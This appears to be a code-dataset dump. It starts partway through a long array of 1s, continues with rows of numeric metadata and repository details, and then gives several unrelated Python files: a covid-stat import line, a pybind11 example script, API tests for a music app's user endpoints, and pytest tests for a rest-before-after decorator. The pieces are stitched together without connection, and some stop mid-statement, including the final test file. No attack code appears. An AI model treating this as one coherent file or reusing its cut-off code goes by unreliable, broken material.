1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 101, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1]))
| 65.2
| 94
| 0.352988
| 2,669
| 8,802
| 1.159236
| 0.019483
| 1.614092
| 2.419198
| 3.223012
| 0.807692
| 0.807692
| 0.807692
| 0.807692
| 0.807692
| 0.807692
| 0
| 0.437974
| 0.340604
| 8,802
| 134
| 95
| 65.686567
| 0.095107
| 0.007953
| 0
| 0.697479
| 0
| 0
| 0.000918
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02521
| false
| 0
| 0
| 0
| 0.092437
| 0.042017
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
de07d147e77cb5edb2b0f2dd267fd68ccc4ad008
| 34
|
py
|
Python
|
src/utils/__init__.py
|
CS-UIT-AI-CLUB/covid-stat
|
5e1ba8049cec2d0917e736cc1c52e082669407c7
|
[
"MIT"
] | null | null | null |
src/utils/__init__.py
|
CS-UIT-AI-CLUB/covid-stat
|
5e1ba8049cec2d0917e736cc1c52e082669407c7
|
[
"MIT"
] | null | null | null |
src/utils/__init__.py
|
CS-UIT-AI-CLUB/covid-stat
|
5e1ba8049cec2d0917e736cc1c52e082669407c7
|
[
"MIT"
] | null | null | null |
from .fetch_data import fetch_data
| 34
| 34
| 0.882353
| 6
| 34
| 4.666667
| 0.666667
| 0.642857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 1
| 34
| 34
| 0.903226
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
de126a04ff7ca8f0e77e73917b34a0af12024bb5
| 94
|
py
|
Python
|
13_static_cast/test.py
|
tdegeus/pybind11_examples
|
1123dff913a2f0a125eed1c1f56d60d24ed6f505
|
[
"MIT"
] | 430
|
2017-05-31T05:02:52.000Z
|
2022-03-31T09:17:20.000Z
|
13_static_cast/test.py
|
tdegeus/pybind11_examples
|
1123dff913a2f0a125eed1c1f56d60d24ed6f505
|
[
"MIT"
] | 6
|
2018-01-31T00:46:54.000Z
|
2021-08-30T07:05:25.000Z
|
13_static_cast/test.py
|
tdegeus/pybind11_examples
|
1123dff913a2f0a125eed1c1f56d60d24ed6f505
|
[
"MIT"
] | 69
|
2017-09-06T03:22:12.000Z
|
2022-03-31T09:17:21.000Z
|
import mymodule
print(mymodule.Foo().bar([1, 2, 3]))
print(mymodule.Foo().bar([1, 2, 3], 3))
| 18.8
| 39
| 0.62766
| 17
| 94
| 3.470588
| 0.470588
| 0.440678
| 0.542373
| 0.644068
| 0.745763
| 0.745763
| 0.745763
| 0
| 0
| 0
| 0
| 0.083333
| 0.106383
| 94
| 4
| 40
| 23.5
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 10
|
a9cd2c19a3fbd84944fc04e8ff8dd64534af20e9
| 7,369
|
py
|
Python
|
tests/test_resource/test_user.py
|
yhfyhf/wang_fm
|
250c053256a6337c7b07a56f4b859c648b4d9a16
|
[
"MIT"
] | 30
|
2015-01-14T16:07:44.000Z
|
2020-11-20T14:20:05.000Z
|
tests/test_resource/test_user.py
|
yhfyhf/wang_fm
|
250c053256a6337c7b07a56f4b859c648b4d9a16
|
[
"MIT"
] | 2
|
2015-04-03T01:56:29.000Z
|
2017-10-03T03:29:44.000Z
|
tests/test_resource/test_user.py
|
yhfyhf/wang_fm
|
250c053256a6337c7b07a56f4b859c648b4d9a16
|
[
"MIT"
] | 17
|
2015-01-01T07:20:28.000Z
|
2020-11-20T14:20:22.000Z
|
#!/usr/bin/env python
# encoding: utf-8
import json
from model.user import add_user, get_user, check_user_password
from model.music import add_music
from utils import BaseResourceTest
class test_user_list_resource(BaseResourceTest):
def test_get(self):
self.login_as_admin() # this will add a user name admin!
user = add_user('name1', 'pw1', 'normal')
add_user('name2', 'pw2', 'normal')
add_user('name3', 'pw3', 'normal')
add_user('name4', 'pw4', 'normal')
rv = self.app.get('/api/user/?key=' + user.key)
# print json.loads(rv.data)
assert len(json.loads(rv.data)) == 1
rv = self.app.get('/api/user/')
assert json.loads(rv.data)['count'] == 4 + 1
rv = self.app.get('/api/user/?name=name1')
assert len(json.loads(rv.data)) == 1
rv = self.app.get('/api/user/?start=0&end=2')
assert len(json.loads(rv.data)) == 2
rv = self.app.get('/api/user/?start=0')
assert len(json.loads(rv.data)) == 4 + 1
def test_post(self):
self.app.post('/api/user/',
data={'name': u'姓名',
'password': u'密码'})
self.login_as_admin()
rv = self.app.get(u'/api/user/?name=姓名')
rv = json.loads(rv.data)[0]
#print rv
assert rv['name'] == u'姓名'
assert rv['level'] == 'normal'
rv = self.app.post('/api/user/',
data={'name': u'姓名',
'password': u'密码'})
rv = json.loads(rv.data)
assert rv is None
class test_user_resource(BaseResourceTest):
def test_patch(self):
self.login_as_admin() # this will add a user name admin!
user = add_user('name1', 'pw1', 'normal')
user_key = user.key
rv = self.app.patch('/api/user/%s/' % (user_key),
data={'password': 'new_password',
'level': 'admin'})
rv = json.loads(rv.data)
assert rv['level'] == 'admin'
user = get_user(key=user_key)[0]
assert check_user_password(user, 'new_password')
def test_delete(self):
self.login_as_admin() # this will add a user name admin!
user = add_user('name1', 'pw1', 'normal')
user_key = user.key
assert len(get_user(key=user_key)) == 1
self.app.delete('/api/user/%s/' % (user_key))
assert len(get_user(key=user_key)) == 0
class test_user_current_resource(BaseResourceTest):
def test_get(self):
rv = self.app.get('/api/user/current/')
rv = json.loads(rv.data)
assert rv is None
add_user('name1', 'pw1', 'normal')
rv = self.app.post('/api/user/current/',
data={'name': 'name1',
'password': 'pw1'})
rv = self.app.get('/api/user/current/')
rv = json.loads(rv.data)
assert rv['name'] == 'name1'
assert rv['level'] == 'normal'
def test_post(self):
add_user('name1', 'pw1', 'normal')
add_user('name2', 'pw2', 'disable')
rv = self.app.post('/api/user/current/',
data={'name': 'name1',
'password': 'pw1'})
rv = json.loads(rv.data)
assert rv['name'] == 'name1'
assert rv['level'] == 'normal'
rv = self.app.post('/api/user/current/',
data={'name': 'name1',
'password': 'unknown'})
rv = json.loads(rv.data)
assert rv is None
rv = self.app.post('/api/user/current/',
data={'name': 'name2',
'password': 'pw2'})
rv = json.loads(rv.data)
assert rv is None
def test_delete(self):
add_user('name1', 'pw1', 'normal')
rv = self.app.post('/api/user/current/',
data={'name': 'name1',
'password': 'pw1'})
rv = self.app.delete('/api/user/current/')
rv = self.app.get('/api/user/current/')
rv = json.loads(rv.data)
assert rv is None
class test_user_current_history_resource(BaseResourceTest):
def test_get(self):
self.login_as_admin() # this will add a user name admin!
rv = self.app.get('/api/user/current/history/?start=0&end=10')
rv = json.loads(rv.data)
assert rv == []
rv = self.app.get('/api/user/current/history/?start=0')
rv = json.loads(rv.data)
assert rv == []
def test_post(self):
self.login_as_admin() # this will add a user name admin!
music1 = add_music('title', 'artist', 'album', 'company',
'2013', '64', self.cover, self.audio, 'uuid1')
self.cover.seek(0)
self.audio.seek(0)
music2 = add_music('title', 'artist', 'album', 'company',
'2013', '64', self.cover, self.audio, 'uuid2')
rv = self.app.get('/api/user/current/history/?start=0')
rv = json.loads(rv.data)
assert len(rv) == 0
self.app.post('/api/user/current/history/',
data={'op': 'favor', 'key': music1.key})
self.app.post('/api/user/current/history/',
data={'op': 'dislike', 'key': music2.key})
self.app.post('/api/user/current/history/',
data={'op': 'listened', 'key': music2.key})
self.app.post('/api/user/current/history/',
data={'op': 'shared', 'key': music2.key})
self.app.post('/api/user/current/history/',
data={'op': 'unknown', 'key': music2.key})
rv = self.app.get('/api/user/current/history/?start=0&end=10')
rv = json.loads(rv.data)
assert len(rv) == 4
rv = self.app.get('/api/user/current/history/?start=0')
rv = json.loads(rv.data)
assert len(rv) == 4
class test_user_current_favor_resource(BaseResourceTest):
def test_get(self):
self.login_as_admin() # this will add a user name admin!
music1 = add_music('title', 'artist', 'album', 'company',
'2013', '64', self.cover, self.audio, 'uuid1')
self.cover.seek(0)
self.audio.seek(0)
music2 = add_music('title', 'artist', 'album', 'company',
'2013', '64', self.cover, self.audio, 'uuid2')
rv = self.app.get('/api/user/current/favor/?start=0')
rv = json.loads(rv.data)
assert len(rv) == 0
rv = self.app.post('/api/user/current/history/',
data={'op': 'favor', 'key': music1.key})
print rv.status
assert rv.status_code == 200
rv = self.app.post('/api/user/current/history/',
data={'op': 'favor', 'key': music2.key})
assert rv.status_code == 200
rv = self.app.post('/api/user/current/history/',
data={'op': 'favor', 'key': 'unknown key'})
assert rv.status_code == 400
rv = self.app.get('/api/user/current/favor/?start=0&end=10')
rv = json.loads(rv.data)
# print rv
assert len(rv) == 2
rv = self.app.get('/api/user/current/favor/?start=0')
rv = json.loads(rv.data)
assert len(rv) == 2
| 38.989418
| 73
| 0.518795
| 940
| 7,369
| 3.98617
| 0.101064
| 0.065386
| 0.067254
| 0.092074
| 0.82039
| 0.784895
| 0.745663
| 0.732052
| 0.723779
| 0.660795
| 0
| 0.023481
| 0.312254
| 7,369
| 188
| 74
| 39.196809
| 0.715864
| 0.03759
| 0
| 0.691824
| 0
| 0
| 0.202655
| 0.07626
| 0
| 0
| 0
| 0
| 0.194969
| 0
| null | null | 0.062893
| 0.025157
| null | null | 0.006289
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e766343ebc9e5cabfb88d1bccd35040f0e60872a
| 7,827
|
py
|
Python
|
test/test_bvr_rest_before_after.py
|
doedotdev/bvr
|
023fc93424fa6a50c8a3c2ce2fc48b76a041b58c
|
[
"MIT"
] | null | null | null |
test/test_bvr_rest_before_after.py
|
doedotdev/bvr
|
023fc93424fa6a50c8a3c2ce2fc48b76a041b58c
|
[
"MIT"
] | 12
|
2019-12-07T21:40:23.000Z
|
2019-12-07T21:43:54.000Z
|
test/test_bvr_rest_before_after.py
|
doedotdev/bvr
|
023fc93424fa6a50c8a3c2ce2fc48b76a041b58c
|
[
"MIT"
] | null | null | null |
from bvr.bvr_rest import bvr_rest_before_after
def test_bvr_rest_before_after_called_as_decorator(capsys):
@bvr_rest_before_after
def rest_before_after():
return 2
return_value = rest_before_after()
captured_ouput = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_called_as_callable_returning_decorator(capsys):
@bvr_rest_before_after()
def rest_before_after():
return 2
return_value = rest_before_after()
captured_ouput = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_called_as_decorator_with_function_args(capsys):
@bvr_rest_before_after
def rest_before_after(msg):
print(msg)
return msg
return_value = rest_before_after("Hello")
captured_ouput = capsys.readouterr().out
assert return_value == "Hello"
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: ('Hello',) | KWARGS: {} \n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: ('Hello',) | KWARGS: {} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_called_as_callable_returning_decorator_with_function_args(capsys):
@bvr_rest_before_after()
def rest_before_after(msg):
print(msg)
return msg
return_value = rest_before_after("Hello")
captured_ouput = capsys.readouterr().out
assert return_value == "Hello"
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: ('Hello',) | KWARGS: {} \n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: ('Hello',) | KWARGS: {} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_called_as_decorator_with_function_kwargs(capsys):
@bvr_rest_before_after
def rest_before_after(msg):
print(msg)
return msg
return_value = rest_before_after(msg="Hello")
captured_ouput = capsys.readouterr().out
assert return_value == "Hello"
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {'msg': 'Hello'} \nHello\n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {'msg': 'Hello'} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_called_as_callable_returning_decorator_with_function_kwargs(capsys):
@bvr_rest_before_after()
def rest_before_after(msg):
print(msg)
return msg
return_value = rest_before_after(msg="Hello")
captured_ouput = capsys.readouterr().out
assert return_value == "Hello"
assert "RESTING_BEFORE: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {'msg': 'Hello'} \nHello\n" in captured_ouput
assert "RESTING_AFTER: 5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {'msg': 'Hello'} " in captured_ouput
assert rest_before_after.__name__ == "rest_before_after" # Important for decorators to not override method name
def test_bvr_rest_before_after_with_countdown_true(capsys):
@bvr_rest_before_after(countdown=True)
def rest_before_after():
return 2
return_value = rest_before_after()
captured_output = capsys.readouterr().out
assert return_value == 2
assert "RESTING_BEFORE: 5/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
assert "RESTING_BEFORE: 4/5 second(s) | FUNCTION: rest_before_after | ARGS: () | KWARGS: {} \n" in captured_output
